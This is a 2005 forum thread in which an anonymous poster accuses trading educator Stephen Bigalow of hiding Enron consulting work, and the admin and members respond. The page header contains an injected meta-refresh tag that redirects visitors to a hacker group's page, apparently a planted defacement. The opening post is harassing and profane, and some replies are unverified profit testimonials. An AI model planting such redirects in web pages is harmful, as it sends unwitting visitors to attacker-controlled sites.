Forum Index" /> <meta http-equiv="refresh" content="0;URL=http://www.turkhacks.com/dosya/heyk.html"> :: View topic - How did working for Enron go, Bigalow?
<meta http-equiv= Forum Index" vspace="1" />
Revolutionizing Investor Psychology

FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

How did working for Enron go, Bigalow?

Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading
View previous topic :: View next topic  
BigalowCrook

PostPosted: Wed Sep 14, 2005 10:25 am    Post subject: How did working for Enron go, Bigalow? Reply with quote

Hey, Bigalow, how come you removed your job at Enron from your resume? And how come you don't actually trade for your own account? Respond to me here publicly, pussy. I won't stop until you do.

P.S. I use a different proxy every day.
candlestick1
Site Admin

PostPosted: Wed Sep 14, 2005 11:41 am    Post subject: Enron Association Reply with quote

In keeping with the purpose of this forum, helping investors to learn candlestick trading, outside promotions and comments that do not contribute to the education process are routinely deleted. However, with the implication that something is being hidden about my previous association with Enron will be addressed to rectify the misinformation conveyed in your questions.

There is nothing about consulting for Enron that has ever been hidden. The consulting contract, originally scheduled for three months, was extended to over an eight month period. My contract was over well before the demise of the company. These facts are not hidden. As a matter of fact, that knowledge is fairly widely known to forum members and visitors. It is clearly stated in the book and on the flap cover. That information has not been altered over the past 4 reprints. I greatly enjoyed the associations I made with the people that I was working with. I still have many good friends from Enron.

The fact that probably less than one dozen people destroyed the hard-working efforts of over 22,000 employees does not make 22,000 people crooks. I am greatly saddened that many people I knew from Enron have been devastated financially and healthwise. Once again, there is no reason to hide the fact that I did consulting work for Enron. It is mentioned in many of my presentations.

As far as the issue of trading my own accounts, I question where you come up with that knowledge. I trade my own account, family accounts, as well as a few other accounts.

I hope this clarifies matters for you. If you need any further information, please feel free to call. I will be glad discuss any issues with you or anybody else that has questions.

Thanks

Last edited by candlestick1 on Wed Sep 14, 2005 12:06 pm; edited 1 time in total
tab321

PostPosted: Wed Sep 14, 2005 11:51 am    Post subject: To the Bigalow Crook Reply with quote

Dear Mr. "Bigalow Crook" as you call yourself

You must have a personal beef with Steve Bigalow. Suppose he did remove his job at Enron from his resume.....what has that got to do with Candle Signals and his knowledge of them? Suppose he does not trade his own account......what does that have to do with Candle Signals and his knowledge of them?

Personally, I have found Steve Bigalow to be one of the few (maybe the only) honest newsletter people who is not just trying to milk another nickel out of the subscribers. Bigalow is not a Hype man and he does not claim to know any secrets that you can only get from him. He basically just likes candles, knows them, and tries to teach them to us who want to learn them. I have spent a LOT of money buying stuff from Steve Bigalow but at the same time.......I have also received a bunch of free stuff from him that he chose to give away instead of sell.

What is your point with this stuff? What does this stuff have to do with Candle Signals? Please explain - I am confused. Actually, I had almost forgotten about Enron until you mentioned it.

PostPosted: Wed Sep 14, 2005 12:13 pm    Post subject: Reply with quote

Hey man.....Get a life. Take your filthy mouth and all of your "proxies" to the Courts and use them there on the few who 'REALLY' were at the controls in bringing the company to its knees. Or do you hide your face behind "proxies" because it's the only way you can be a "big man (mouth)". Go away or make yourself public so that we can all see if you look as filthy as your mouth.!

PostPosted: Wed Sep 14, 2005 12:21 pm    Post subject: Reply with quote

To speculate that one person doing contract work with Enron could have brought down the company or for that matter had anything to do with it shows your lack of intelligence.(as if your childish name calling had not already)
I have been in the investment business for a long time and came across Steve a little less than 4 years ago. I have made hundreds of thousands of dollars using his picks as well as by generating my own ideas from what I learned from him.
I do not know Steve personally however have chatted with him on occasion. He seems like a stand up guy to me that just wants to help the everyday investor make money in this business.
You WILL have a hard time finding someone in this business that is more consistent. I challenge you to find someone.
You most likely are jealous of something Steve has done or just have too much time on your hands and if this is the case you should read one of his books and make yourself a few bucks!!!!!
kermitp

PostPosted: Wed Sep 14, 2005 1:20 pm    Post subject: Re: How did working for Enron go, Bigalow? Reply with quote

BigalowCrook wrote:
Hey, Bigalow, how come you removed your job at Enron from your resume? And how come you don't actually trade for your own account? Respond to me here publicly, pussy. I won't stop until you do.

P.S. I use a different proxy every day.

We all appreciate that you may have a problem with Steve but please don' t make everyone here suffer because of it. Take it offline please.

If I had Enron on my resume I'd take it off and so would you. Of course, there were thousand of great folks who worked there. Only afew were responsible for the failure and Steve was not one of them.

So let's move on and use this forum as it was intended. That is as a vechile for trading trading ideas. Not for attacking others.
sailorboy

PostPosted: Wed Sep 14, 2005 1:47 pm    Post subject: A case for a strong mouth wash Reply with quote

Look here Mr. Bigalow Crook (as you call yourself) we have had about enough of your bad mouth. Please take careful note that we all here to follow Steve’s teachings of our own free will and because we like Steve Bigalow and his candlestick method. You must be a pretty a pretty unhappy bloke to waste your time bad mouthing Steve. Surely there are more useful ways of spending your time. May I suggest trying your hand at making some money on the stock market, or is that beyond the limited capacity of your mind. Perhaps you should try asking Steve to give you some lessons on the subject if you apologies, that is. So leave us in peace and take your frustration elsewhere

Sailorboy

PostPosted: Wed Sep 14, 2005 2:00 pm    Post subject: Reply with quote

Bigalow's book is the ONLY book that I've had that has really helped me make money. It hasn't made every trade work, but nothing will. What it has done is given me much better odds. None of the other books or sites did that.

As for Enron, they went up in smoke because the accounting was a fraud, not because of bad trades.
Greydog1

PostPosted: Wed Sep 14, 2005 4:28 pm    Post subject: Bigalow Crook Reply with quote

Dear Guest:

Actually, you can use as many and any proxy you want. Your pain and the hurting inside will give you away everytime. I'm sorry for what has gone against you in the past and hope a brighter day comes soon. The pain has affected your outlook on life. Try to get some help.

It's none of my business or concern who Br. Bigalow has associated with. I appreciate the instruction and educational tools provided by the Candlestick Forum. I'm in this group to learn a different trading technique, make some money, and enjoy the fellowship of serious traders.
Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading All times are GMT - 5 Hours
Page 1 of 1

Jump to: